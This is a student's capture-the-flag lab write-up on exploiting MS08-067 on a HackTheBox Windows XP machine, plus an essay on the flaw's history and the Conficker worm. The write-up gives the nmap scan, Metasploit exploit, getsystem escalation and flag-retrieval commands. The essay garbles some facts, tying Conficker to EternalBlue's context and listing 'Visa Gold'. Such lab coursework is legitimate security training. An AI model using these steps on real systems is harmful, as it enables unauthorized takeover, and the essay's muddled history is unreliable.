Week 1 MS08-067 Lab PDF

Preview

Summary

MS08-067 is a remote code execution vulnerability that took the world by storm when it hit windows systems in 2008. The famous exploit, which targeted Windows XP machines, allowed attackers to get direct access to vulnerable hosts and completely control targets remotely.
This lab, found in the...

Description

6/6/2021 CYB 633

Requirements ● ●

Screenshots to help illustrate answers to questions. Answer questions with full sentences.

Introduction

This is a HackTheBox lab that takes advantage of an old Windows vulnerability MS08-067 on a Windows XP machine. It starts off by enumerating the vulnerability with Nmap, then runs Metasploit to execute the exploit, establish a connection, and then create a shell. From there, I search the machine for a flag in a specific file, demonstrating I have access to the user. I then go back to the meterpreter console, grant myself admin privileges, create another shell, and search for the root flag, which demonstrates I have access to the administrator account. After this, I create an essay that discusses the history of MS08-067.

1.Gaining Access I had problems enumerating the vulnerability. I discussed them with you over email. I am not sure if the problem was at my end or theirs, but I was finally able to get it. sudo nmap --script smb-vuln-ms08-067.nse -p 445 10.10.10.4

When I was finally able to enumerate the vulnerability, I had problems exploiting it. When I was able to enumerate the vulnerability, I would run Metasploit and try to exploit it. It would fail and I would exit, attempt to enumerate the vulnerability again, the port 445 would show as filtered. I do not know what the problem was. I do not see how it could have been on my end considering this also happened on PwnBox. I did end up getting it done the openvpn way. sudo msfdb run use exploit/windows/smb/ms08_067_netapi set rhosts 10.10.10.4 set lhost tun0 exploit

getuid shell

1. What is the user.txt flag? The user.txt flag is “e69af0e4f443de7e36876fda4ec7644f” (without the quotes). Here I went to the root directory and searched all subdirectories for “user.txt” because I was not sure where it was. cd\ dir user.txt /s cd\Documents and Settings\john\Desktop type user.txt

2.Privilege Escalation 1. What is the root.txt flag? The root flag is “993442d258b0e0ec917cae9e695d5713” (without the quotes). I had to go back to meterpreter to get admin privileges and then execute another shell. Then, I did the same thing as before, going to the root directory and searching subdirectories for “root.txt”. getsystem shell cd\ dir root.txt /s cd\Documents and Settings\Administrator\Desktop type root.txt

3.Paper For this lab, please submit a 2-3 page paper that discusses the history of MS08-067. The paper should discuss organizations that affected by the exploit, and how the technology field responded to is. In addition, please be creative in writing about the exploit. Here are some other ideas to ponder and write about: -

Who created the exploit? Why are businesses still using Windows XP? Have there been any similar exploits since then? What country or company was affected the most by MS08-067?

The paper will require APA formatting and citations should be properly cited both intext and in the reference section of the paper. The reference section and title page do not count towards the total page count. Please submit the paper portion as “FirstName_LastName_MS08_067.docx”.

History of MS08-067

This essay focuses on the history of MS08-067 and not so much the details of what it is. Still, it is appropriate to introduce what it is for context. MS08-067 is a remote code execution vulnerability that allows an attacker to run arbitrary code on Windows 2000 Service Pack (SP) 4, Windows XP SP2 and SP3, Windows Server 2003 SP1 and SP2, Visa Gold SP1, Windows Server 2008, and Windows 7 systems. The Common Vulnerabilities and Exposures (CVE) site calls this vulnerability CVE-2008-4250. The Common Vulnerability Scoring System (CVSS) rates it at a 10.0. (Burton, n.d.).

In the month of September 2008, there were reports of hackers from China selling Windows exploit kits that exploited a Windows security flaw and execute a buffer overflow at port 445. The hackers were selling the exploit for $37. There was malware at the time known as Grimmiv that used this very Windows vulnerability, so it is believed that the developers of Grimmiv may have used the exploit sold by these hackers. (“Microsoft Volume”, n.d.). Microsoft released a patch for the vulnerability on October 23rd, 2008. Normally Microsoft releases patches on the second Tuesday of each month known as “patch Tuesday”, so this was an emergency patch. Since a lot of hackers had became aware of the vulnerability due to the announcement of the emergency patch, they could use it to their advantage to attack machines that had not yet applied it, and so the news ended up being a double-edged sword. Windows XP support was discontinued on April 8, 2014. One of the reasons older Windows machines, such as Windows 7 and Windows XP, still exist on many systems in businesses is because those businesses are ineligible for volume licensing (Sanders, 2019). Volume licensing is licensing software in volumes, which makes it easier and more affordable to run on multiple computers within a single organization (“Understand Microsoft”, 2021). Some

businesses may also have old hardware, such as custom-made devices, security equipment, and network devices that rely on drivers that were never updated for modern versions of Windows. MS08-067 uses what hackers call arbitrary code execution (ACE) or remote code execution (RCE). There have been quite a few vulnerabilities since MS08-067 like this. One of the ones we did in the lab was CVE-2014-7169, a remote code execution vulnerability dubbed Shellshock. We also learned about CVE-2017-0144, dubbed EternalBlue, which takes advantage of Microsoft Windows’ Server Message Block (SMB). The vulnerability led to the creation of the infamous Conficker worm. Once Conficker infects a system, it disables a lot of its automatic backup settings and security features, deletes restore points, and opens connections to receive instructions from a remote computer. It propogated to millions of systems over time and there ended up being multiple variants (Burton, n.d.). The worm still exists to this day and its difficult to know its exact damages, but there are some notable reports. The biggest damage estimate I have come across is in the United Kingdom, when the Macnhester City Council lost $2.4 million (equivalent in pounds) in Conficker cleanup costs and lost revenue due to downtime (Danchev, 2009). The French Navy was also affected by the worm. They had to cut network connectivity to stop it from spreading on its Intramar network, which stopped email messaging and web browsing. Planes ended up being forced to land (Cenciotti, 2009). The Conficker worm was believed to originate from Ukrainian cybercriminals. The Ukraine disrupted a $72 million Conficker hacking ring back in 2011. An international effort led to the arrest of two people who were tied to Latvians gangs. They were charged with wire fraud and computer fraud. (Kirk, 2011).

This essay was on the history of MS08-067. I started off by briefly describing what it is followed by its origins. I could not verify definitively who created it, which makes sense since, as explained in a few of the articles I read, no one would want to be known for it and no one would claim to be the author. It appears to have originated in China, and the Conficker worm from the Ukraine. I then talked about the double-edged sword of Microsoft announcing the vulnerability and releasing an emergency patch for it. I discussed why some companies still use old versions of Windows. I described how many computers it may have affected and some of the damages it costed. As described in one article I came across, Conficker is a worm that “just won’t die”. The vulnerability will always exist, but the worm does have potential to go away, but it is not going to happen any time soon.

Burton, K. (n.d.) The Conficker Worm. Sans. Retrieved from https://www.sans.org/securityresources/malwarefaq/conficker-worm Cenciotti, D. (February 13, 2009). French Navy Rafales Grounded by a Computer Virus. The Aviationist. Retrieved from https://theaviationist.com/2009/02/13/french-navy-rafalesgrounded-bya-computer-virus/ Danchev, D. (July 2, 2009). Manchester City Council Pays $2.4m in Conficker Clean Up Costs. ZDNet. Retrieved from https://www.zdnet.com/article/manchester-city-council-pays-24m-in-conficker-clean-up-costs/ Kirk, J. (June 23, 2011). Update: Ukraine disrupts $72M Conficker hacking ring. Computer World. Retrieved from https://www.computerworld.com/article/2509397/update-ukraine-disrupts--72m-conficker-hacking-ring.html

Learning from History – The Conficker Outbreak. (n.d.). Cybersecurity Insiders. Retrieved from https://www.cybersecurity-insiders.com/learning-from-history-the-confickeroutbreak/ Microsoft Volume Licensing. (n.d.). Retrieved from https://www.techopedia.com/definition/2554/microsoft-volume-licensing Sanders, J. (July 30, 2019). It's 2019, and One Third of Businesses Still Have Active Windows XP Deployments. TechRepublic. Retrieved from https://www.techrepublic.com/article/its-2019-and-one-third-of-businesses-still-haveactive-windows-xp-deployments/...